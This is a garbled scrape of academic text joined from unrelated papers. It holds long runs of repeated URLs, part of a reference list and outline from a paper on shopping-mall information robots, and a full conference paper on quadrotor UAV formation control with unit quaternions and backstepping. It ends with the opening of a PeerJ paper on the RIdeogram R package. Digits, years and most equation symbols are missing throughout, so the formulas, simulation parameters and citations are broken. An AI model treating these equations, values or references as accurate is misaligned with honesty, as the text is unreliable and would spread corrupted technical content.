#supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /thms. . http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf http://dx.doi.org/ . /s scc _ http://dx.doi.org/ . /peerj-cs. gross h-m, boehme h, schroeter c, mueller s, koenig a, einhorn e, martin c, merten m, bley a. . toomas: interactive shopping guide robots in everyday use—final implementation and experiences from long-term field trials. in: ieee/rsj international conference on intelligent robots and systems (iros ). piscataway: ieee, – . kanda t, shiomi m, miyashita z, ishiguro h, hagita n. . an affective guide robot in a shopping mall. in: acm/ieee international conference on human–robot interaction (hri ). piscataway: ieee, – . kobayashi y, shibata t, hoshi y, kuno y, okada m, yamazaki k. . choosing answerers by observing gaze responses for museum guide robots. in: acm/ieee international conference on human–robot interaction (hri ). piscataway: ieee, – . kollar t, tellex s, roy d, roy n. . toward understanding natural language directions. in: acm/ieee international conference on human–robot interaction (hri ). piscataway: ieee, – . kopp s, tepper pa, ferriman k, striegnitz k, cassell j. . trading spaces: how humans and humanoids use speech and gesture to give directions. in: nishida t, ed. conversational informatics: an engineering approach. chichester: john wiley & sons, – . matsuda s, jitsuhiro t, markov k, nakamura s. . atr parallel decoding based speech recognition system robust to noise and speaking styles. ieice transactions on information and systems e -d: – doi . /ietisy/e -d. . . mcguinness dl, van harmelen f (eds.) . owl web ontology language overview, w c recommendation. available at http://www.w .org/tr/owl-features/. morales y, satake s, kanda t, hagita n. . modeling environments from a route perspective. in: acm/ieee international conference on human robot interaction (hri ). piscataway: ieee, – . mutlu b, forlizzi j, hodgins j. . a storytelling robot: modeling and evaluation of human-like gaze behavior. in: ieee-ras international conference on humanoid robots (humanoids’ ). piscataway: ieee, – . okuno y, kanda t, imai m, ishiguro h, hagita n. . providing route directions: design of robot’s utterance, gesture, and timing. in: acm/ieee international conference on human–robot interaction (hri ). piscataway: ieee, – . ono t, imai m, ishiguro h. . a model of embodied communications with gestures between humans and robots. in: annual meeting of the cognitive science society (cogsci ). palo alto: aaai, – . available at http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf. rich c, ponsler b, holroyd a, sidner cl. . recognizing engagement in human–robot interaction. in: acm/ieee international conference on human–robot interaction (hri ). piscataway: ieee, – . sidner cl, kidd cd, lee c, lesh n. . where to look: a study of human–robot engagement. in: international conference on intelligent user interfaces (iui ). new york: acm, – . sidner cl, lee c, lesh n. . engagement by looking: behaviors for robots when collaborating with people. in: kruiff-korbayova, kosny, eds. diabruck: the proceedings of the seventh workshop on the semantics and pragmatics of dialogue. saarbrücken: saarland university, – . thrun s, bennewitz m, burgard w, cremers ab, dellaert f, fox d, hahnel d, rosenberg c, roy n, schulte j, schulz d. . minerva: a second-generation museum tour-guide robot. in: ieee international conference on robotics and automation (icra ). piscataway: ieee, – . satake et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /ietisy/e -d. . http://www.w .org/tr/owl-features/ http://www.w .org/tr/owl-features/ http://www.w .org/tr/owl-features/ http://www.w .org/tr/owl-features/ http://www.w .org/tr/owl-features/ http://www.w .org/tr/owl-features/ http://www.w .org/tr/owl-features/ http://www.w .org/tr/owl-features/ http://www.w .org/tr/owl-features/ http://www.w .org/tr/owl-features/ http://www.w .org/tr/owl-features/ http://www.w .org/tr/owl-features/ http://www.w .org/tr/owl-features/ http://www.w .org/tr/owl-features/ http://www.w .org/tr/owl-features/ http://www.w .org/tr/owl-features/ http://www.w .org/tr/owl-features/ http://www.w .org/tr/owl-features/ http://www.w .org/tr/owl-features/ http://www.w .org/tr/owl-features/ http://www.w .org/tr/owl-features/ http://www.w .org/tr/owl-features/ http://www.w .org/tr/owl-features/ http://www.w .org/tr/owl-features/ http://www.w .org/tr/owl-features/ http://www.w .org/tr/owl-features/ http://www.w .org/tr/owl-features/ http://www.w .org/tr/owl-features/ http://www.w .org/tr/owl-features/ http://www.w .org/tr/owl-features/ http://www.w .org/tr/owl-features/ http://www.w .org/tr/owl-features/ http://www.w .org/tr/owl-features/ http://www.w .org/tr/owl-features/ http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://conferences.inf.ed.ac.uk/cogsci /pdf-files/ .pdf http://dx.doi.org/ . /peerj-cs. what should we know to develop an information robot? introduction related works information-providing robots direction-giving interaction engagement knowledge representation information in a shopping mall daily tasks of information service expectations from information robot requirements system architecture knowledge representation behavior controller dialog manager other modules preliminary trials: lack of `knowledge' for interaction field experiment experiment experiment evaluation of system performance limitation conclusion acknowledgements references international conference on sensor network and computer engineering (icsnce ) quadrotor formation inversion control method based on unit quaternion wang zhongsheng school of computer science and engineering xi'an technological university xi’an, , china e-mail: @qq.com yang sen department of uav engineering, ordance engineering college, shijiazhuang, china school of automation science and electrical engineer- ing, beihang university, beijing, china dong hairui department of uav engineering ordance engineering college shijiazhuang, china abstract—in this paper, the formation control problem of quadrotor is studied under ideal communication condition. the quadrotor has a complex mathematical model. first, the unit quaternion method is used to describe its dynamic model and kinematic model. it is decomposed into two in- dependent subsystems of position and attitude. the tracking error model is established by introducing the error between the ture trajectory and the desired trajectory. and then appointing a member of formation as a pilot, formation members get the geometric center position as the desired trajectory through the consistency algorithm. the back- stepping method is used to design the time-varying feedback control law for each four-rotor, so that the formation is stabilized. finally, the effectiveness of the control method is verified by simulation experiments. keyword-formation control; quadrotor; quaternion; inversion method; leader-follower method i. introduction in recent years, with the rapid development of small unmanned aerial vehicles, researchers are concerned with quadrotor because it has simple structure and is easy to control. quadrotor can not only carry out vertical takeoff, landing and autonomous hover function, but also the task efficiently under the uncertain and dangerous environ- ment. however, faced with diverse combat missions, single uav is more and more difficult to meet the needs of the mul- ti-uav collaborative control concept come into being. uav formation control is an important basic research track in the field of multi-uav collaborative control. reasonable forma- tion control method can make the uav formation quickly get the air superiority and finish the combat task more efficiently. on the future battlefield, uav will play an irreplaceable role. the research of methods of formation control mainly con- tains leader-follower method, virtual structure, graph theory and behavior-based[ ]. at present, the mainstream is the inte- gration of the above methods. early formation control mainly uses centralized control method that is characterized by high precision and easy to control, but depends on the calculation capabilities and global communication capabilities of the cen- tral control unit. with the increasing number of the formation members, the calculation of the central control unit increases exponentially, therefore this method lacks scalability and flex- ibility. later, people propose the distributed control method, in which each uav only communicates with the adjacent uav. the surrounding uav relative position relationship is acquired, compared to the expected formation by using of uav's own computing power. the actual position of the uav is corrected to eliminate the formation error. international conference on sensor network and computer engineering (icsnce ) in recent years, many scholars aim at problems of the quadrotor formation , and they do a lot of research and design different types of controllers. in literature [ - ], the controller is designed with different degree of simpli- fication to quadrotor model by feedback linearization and small perturbation linearization. however, the quadrotor is a typical underactuated system, a cascade nonholo- nomic system with complex constraint equations, which has a strong nonlinearity and thus needs a higher re- quirement for the control system. in literature [ ], the quadrotor is also modeled by unit quaternion and the concept of manifold is introduced. the attitude control algorithm is designed under the differential geometry framework and gets a nice effect. literature [ ] combines the nonlinear part of the system identified by neural net- work online and leader-follower method to realize the formation control of the quadrotor. in literature [ ], the kinetics and kinematics models of the quadrotor are de- scribed by quaternion and the intermediate control is in- troduced. the formation is stabilized by setting the ap- propriate intermediate control for each uav. in literature [ ], the error of the actual position and the expected po- sition is introduced, and the tracking error model is estab- lished. literature [ ] also divides quadrotor model into two independent subsystems of position and attitude, and each of them uses backstepping method to design the time-varying feedback in order to make the system stable. the backstepping method is a design method of forward and backward recursion. it makes the system error pro- gressive and stable, and it can also reduce the difficulty of design by designing the lyapunov function step by step. based on the above research, the quadrotor mathematical model is established by using the unit quaternion method. then the geometric center position of the formation is calculated by the consistency algorithm and is used as the expected trajectory. finally the whole formation is stable by designing backstepping control for each quadrotor. ii. the property of unit quaternion [ ] quaternion is a number such as a b c d  i j k , where , , ,a b c d is real numbers and , ,i j k is imaginary units. and a set of quaternion  , , , rh a b c d a b c d    i j k is a four-dimensional vector space on real field r. a  is the quaternion scalar part, and q b c d    i j k is the quater- nion vector part. the quaternion can be written as follows:  , qq =  the mold of the unit quaternion is a constant one, that is: q      unit quaternary can be seen as a point on the unit sphere s . quaternion is a powerful tool that represents rotation in three-dimensional space. based on euler theorem, any rotation in a three-dimensional space can be obtained by rotating an angle about the characteristic axis and the corresponding unit quaternion is cos , sin n        q =    ,   ,therein n  is unit vector. given a unit quaternion, the relationship between the cor- responding attitude matrix and the unit quaternion is:       t r q i s q q q    q      where i r   is the unit matrix. the euler angle is      , the attitude matrix can be expressed as: c c c s s s c s s c s c ( ) c s c c s s s s c c s s s s c c c r                                                the error between the actual attitude matrix r and the ex- pected attitude matrix d r is defined as: t d r rr  let     , q q q q  q  and     , p p p p p =  be two units of quaternions. the quaternion multiplication is defined as:   ,t tq p qp p q s q p             the quaternion does not satisfy the exchange law, which is qp pq , but it satisfies the law of union, which is    qp s q ps , and also satisfies the distribution law, which is international conference on sensor network and computer engineering (icsnce )  p q s ps qs   . defining  * , q   q as the conjugate of the quaternion q .the conjugate of qp satis- fies   * * * qp p q . iii. quadrotor model based on unit quaternion the quadrotor uavs are usually divided into type x and type + , with four inputs and six outputs, which are typical underactuated systems. the quadrotor carries out the movements, pitch, roll and yaw of the air- craft by controlling the speed of four independent motors and propellers. quaternion is a simple and effective ma- thematical tool that describes the rotation and movement of rigid bodies in three-dimensional space, which can effectively avoid the appearance of singularity and have the characteristics of high efficiency etc. the quadrotor uav is regarded as the rigid body structure. assuming that the center of gravity is located at the origin of the coordinate system of the body. the motor has no installa- tion error angle, and the motor lift surface is located on the same plane as the aircraft center of mass. using the quaternion to establish the quadrotor of the dynamics model and kinematics model, the quadrotor is decom- posed into the position subsystem  and the attitude subsystem  , and getting the following model:     , : , , : , t v t v ge r e m s                          q q q      in the formula, , v r  is the position and velocity of the quadrotor in the inertial coordinate system, g and m are the mass and gravitational acceleration of the qua- drotor. defining vector   , t t   , where r represents the angular velocity in the body coordinate system. the unit vector for the z-axis is [ ] t e  .t is the lift to provide power system, r  is the role which has effect on the body in the rolling moment, pitch torque and yaw moment.  s  is the antisymmetric matrix for  . for   t     , there is:   s                    iv. controller design and convergence analysis a. problem description considering the uav formation has n  member, number is assigned for the formation of unmanned aerial vehicles. assuming that each uav can access the status in- formation of itself and other members of the formation through its own sensor and wireless communication network. accord- ing to the information exchange among unmanned aerial ve- hicles, uav formation can be in the form of modeling. as- suming that the uav communication topology is an inbound connection diagram. as shown in fig. . at the beginning of the formation, the formation members obtain their own and other members of the formation of state information through the wireless communication network, then the formation of the desired location center and the expected speed are obtained by consistency algorithm, and output to the pose controller, mak- ing the uavs close to the scheduled formation center aggrega- tion. after reaching the specified spacing, the formation of the task is finished. figure . schematic diagram of quadrotor formation international conference on sensor network and computer engineering (icsnce ) regardless of the difference in the quadrotor in the formation, the quadrotor is isomorphic and conforms to the model ( ):     , : - , , : , i i ti i i i i i i i i i i i i v t v ge r e m s                          q q q      define the position error of the i uav is i i d i       , the velocity error is i i idv v    , the angular velocity error is d r    , and the error system model of the i unmanned aerial vehicle which derivatived from above parameters is:              i i i id id id id id i i i i i id i i id i i id i id i id v v g r t i r t m m q s q i j r j r r s                                                      e e e  in the formula, id id n r e is the last column of the expected attitude matrix, id t and id  is the parameter of control for the system.  ,q q    is the error quaternion, and its calculation satisfies the quaternion multiplication algorithm:   ,t td d d d d dq q q qq q q s q q                r is the attitude error matrix, by the formula ( ) available:     t r q i s q q q                the work which is done in this paper is to design the virtual control volume i t and the control torque i  for the i th four-rotor unmanned aerial vehicle, so that the four-rotor for- mation maintains a fixed formation and a fixed distance. that is:. i j d v v v  , i j i j ij         . in the formula, d v is the expected speed for the formation reference, ij  is the desired distance between the i th un- manned aerial vehicle and the j th unmanned aerial vehicle, and is satisfied with ij ji    . b. controller design according to the cascade system analysis method, the qua- drotor error system model is decomposed into position error subsystem and attitude error subsystem. : i i i id id id v v g n t m               e             : i i i i id i id i i id i id i id q s q i j r j r r s                                         the following reference [] uses the backstepping method to design the position subsystem controller and the attitude subsystem controller separately. first step is to define the error between the system state and the virtual feedback:   i i z z v z           in the formula,  is the virtual control. v function is de- fined for each virtual feedback so that each state component international conference on sensor network and computer engineering (icsnce ) has an appropriate progressive. the equation ( ) is es- sentially a differential homeomorphism. to stabilize the original system, it is only necessary to stabilize the error between the original system state and the virtual feed- back. step : find the derivative of x i i z v     define the first lyapunov function: / t v z z ,and i k z k      :      t t t t z z z k z z v z z z z z k z z z z                    obviously, if z  , z asymptotically stable by the above formula, but in general z  , therefore it needs to proceed to the next step, so that z has the desired progressive characteristics. v the derivative of time is:   t t t id id id v k z z z z z g n t k z k z m                e   take     id id id n t g k z k k z m      e ,now t t v k z z k z z   there are positive numbers ,k k in the formula. thus, the z and z exponents converge to , which is globally exponentially stable. according to the nature of the attitude matrix, id n is a unit vector id n  .so each member of the formation of the expected lift id t and virtual control of the amount of id n is acquired.            id id i i id id i i id t m g k k v k k n g k k v k k t m                        e e  in the formula, idn satisfy the constraint equation idn  , since idn does not contain all the desired gesture information where the aircraft can be in the course of flight to maintain the heading angle of °, that is, id   . id  and id  can be ob- tained by calculation. the desired attitude matrix id r is ob- tained according to equation ( ) and then the desired quater- nion( id  and id q  ) is obtained according to equation ( ). qu- aternion error i  and i q  can be obtained through the formu- la ( ). the same method is used to design the control law for the attitude subsystem to stabilize the global exponent, and the error between the system state and the virtual feedback is de- fined as   i z q z z           is the virtual control amount. formation control is mainly concerned with the position control subsystem of the aircraft. therefore, the quadrotor uav i posture subsystem inversion control law is given directly next, the specific deriva- tion process reference literature [ ].          id i i i id i i id t j j r r s k s i                            the reference signal is negotiated by the formation mem- bers through a coherence algorithm. the reference signal needs to meet certain constraints. assuming that the reference signals international conference on sensor network and computer engineering (icsnce ) id  , id  , id  and   id  are bounded and visible to all formation members. the desired position id  and the desired velocity id v are obtained by taking the weighted average of all the members in the formation  i n id j ji n       i n id j ji v v n     it translates the formation problem into a trajectory tracking problem for a given reference signal. in the for- mula, i n is the number of aircraft in the formation with the i th unmanned aerial vehicle as a neighbor. consi- dering the situation that the formation communication topology is no omnidirectional graph, at this time, in ad- dition to the pilot, any aircraft in the formation has the same status, so the subscript i can be ignored. formula ( ) and ( ) are rewritten as follows: n d j jn       n d j j v v n     the formation of the ith uav can be guaranteed through the inversion control law. i d i     , i d v v , i j i j ij         , i j v v can be guaranteed. v. experimental simulation a. parameter setting regardless of the differences among the quadrotor systems, the system quality is assumed . m kg .the moment of inertia is . x y j j kg m   , . kg z j m  . setting the formation size n  , k  , k  . specify the number five of the quadrotor for the pilot, the re- maining four for the followers. assuming that the pilot broad- casts its own state information, the followers are able to receive that in real time, and the communication topology between the followers is an undirected graph. the follower initial position matrix p is:   . . . . . . . . p                   the pilot does uniform circular motion in a fixed height, the movement trajectory is: cos sin x t y t z        the relative positional deviation of the formation is de- scribed by:   . . . .                  the simulation time is . s and the simulation step is . s b. simulation results according to the above parameters, the system model is built with simulink module in matlab, and the control algo- rithm is verified. figure is the three-dimensional map of the formation simulation. in the figure, the black curve is the tra- jectory of the pilot, and the triangle "△ " indicates the final position of each quadrotor uav. at the beginning of the simu- lation, the pilot does circular motion in the air, followers lo- cates on the different positions on the ground, taking off after receiving the state information of the pilot, the first team members calculate the formation center position through the negotiation of calculation , and as a reference tracking signal, algorithm( ) eventually converges the five quadrilateral to the intended formation. a variety of formation can be easily designed by setting a different relative position error. fig. -fig. shows the change of the position and velocity of the fleet members in the formation and maneuvering process. international conference on sensor network and computer engineering (icsnce ) it can be seen from the figure that the followers quickly move closer to the pilot after takeoff. at t = s, the dis- tance from the pilot tends to be the designated position and remains at the same speed as the pilot, and is well tracked by the pilot. the validity of the tactics proposed in this paper is verified. figure . quadrotor formation track simulation curve figure . x-direction uav position and speed curve figure . y-direction uav position and speed curve figure . z-direction uav position and speed curve fig. shows the error between the formation center trajec- tory and the pilot's trajectory calculated by the formation member's negotiation. it can be seen that the formation center finally converges to the position of the pilot. figure . reference trajectory and pilot trajectory error international conference on sensor network and computer engineering (icsnce ) vi. conclusion aiming at the control problem of quadrotor formation, the nonlinear dynamic model and kinematic model are described by unit quaternion. the formation control is achieved by tracking the geometric center of the forma- tion. at the beginning of the formation, team members calculate the formation of the geometric center as a refer- ence signal through the wireless network exchange posi- tion, speed and other state information. each uav is de- signed with time-varying feedback control law through the back stepping method which translates the formation problem into a tracking problem for a given reference signal. the simulation results of matlab show that the method is fast and accurate and the convergence speed of the formation system is improved. the simulation results show that the proposed method is fast and accurate. at present, the method has not yet considered the formation problem and the formation problem with the maximum velocity constraint. the subsequent study will consider the problem of formation, maintenance and reconstruction of the formation under the constraint of uniformity and maximum speed . acknowledgment fund support: shaanxi education department special fund project number: shaanxi education finance[ ] references [ ] survey of developments on multi-agent formation control related problems[j]. control and decision, , ( ): - . [ ] f.rinaldi, s.chiesa, f.quagliotti. linear quadratic control for quadrotors uavs dynamics and formation flight [j]. intell robot syst. ( ): - . [ ] xia liang-sheng. formation control for multi-robot based on flocking[j]. fire control & command control, , ( ): - . [ ] yu b c, dong x w, shi zy, et al. formation control for quadrotor swarm systems: algorithms and experiments [a]. proceedings of the nd chinese control conference[c]. - , july , xi’an china. [ ] wang honghao, chen ming etc. attitude estimation of quadrotor based on quaternion and kalman filtering [j]. microcomputer and application, , ( ): - . [ ] xing guan-sheng, du chun-yan et al. consensus-based distributed motion planning for autonomous formation of miniature quadrotor groups[j]. control and decision, , ( ): - . [ ] fu changyou, cai hongbin etc. design of micro quad-rotor aircraft based on iot[]. modern electronic technique, , ( ): - . [ ] choi insung, choi jongsuk. leader-follower formation control using pid controller[a]. th international conference [c]. - , october, , montreal, canada. [ ] wu cheng-fu, liu xiao-qi etc. modeling and control for a quadrotor uav based on quaternion[j]. flight dynamics, , ( ): - . [ ] dierks t, jagannathan s. neural network control of quadrotor uav formations [a]. american control conference [c]. st.louis, usa, . [ ] abdessameud a, tayebi a. formation control of vtol-uavs [a]. joint th ieee conference on decision and control and th chinese control conference [c]. . [ ] li guang-chun, wang lu, wang zhao-long et al. trajectory tracking control of quad-rotor uav based on quaternion[j]. journal of applied sciences, , ( ): - . submitted august accepted december published january corresponding authors guangchuang yu, gcyu @smu.edu.cn jinhui chen, chenjh@njfu.edu.cn academic editor sebastian ventura additional information and declarations can be found on page doi . /peerj-cs. copyright hao et al. distributed under creative commons cc-by . open access rideogram: drawing svg graphics to visualize and map genome-wide data on the idiograms zhaodong hao , , dekang lv , ying ge , jisen shi , dolf weijers , guangchuang yu and jinhui chen key laboratory of forest genetics & biotechnology of ministry of education, co-innovation center for sustainable forestry in southern china, nanjing forestry university, nanjing, jiangsu, china laboratory of biochemistry, wageningen university, wageningen, haarlem, netherlands institute of cancer stem cell, dalian medical university, dalian, liaoning, china institute of bioinformatics, school of basic medical sciences, southern medical university, guangzhou, guangdong, china abstract background. owing to the rapid advances in dna sequencing technologies, whole genome from more and more species are becoming available at increasing pace. for whole-genome analysis, idiograms provide a very popular, intuitive and effective way to map and visualize the genome-wide information, such as gc content, gene and repeat density, dna methylation distribution, genomic synteny, etc. however, most available software programs and web servers are available only for a few model species, such as human, mouse and fly, or have limited application scenarios. as more and more non-model species are sequenced with chromosome-level assembly being available, tools that can generate idiograms for a broad range of species and be capable of visualizing more data types are needed to help better understanding fundamental genome characteristics. results. the r package rideogram allows users to build high-quality idiograms of any species of interest. it can map continuous and discrete genome-wide data on the idiograms and visualize them in a heat map and track labels, respectively. conclusion. the visualization of genome-wide data mapping and comparison allow users to quickly establish a clear impression of the chromosomal distribution pattern, thus making rideogram a useful tool for any researchers working with omics. subjects bioinformatics, data science, graphics, visual analytics keywords genome, chromosome, idiogram, r package, data visualization introduction recently, with the development of sequencing technologies, especially rapid advances in third generation sequencing including pacific biosciences (eid et al., ) and oxford nanopore technologies (laver et al., ), bionano genome mapping (cao et al., ) and high-throughput chromatin conformation capture sequencing (dekker et al., ), more and more species have their genomes sequenced or updated to the chromosome level (jiao & schneeberger, ; phillippy, ). after the chromosome-level genome completion, an overview of some genome characteristics can help to better understand a how to cite this article hao z, lv d, ge y, shi j, weijers d, yu g, chen j. . rideogram: drawing svg graphics to visualize and map genome-wide data on the idiograms. peerj 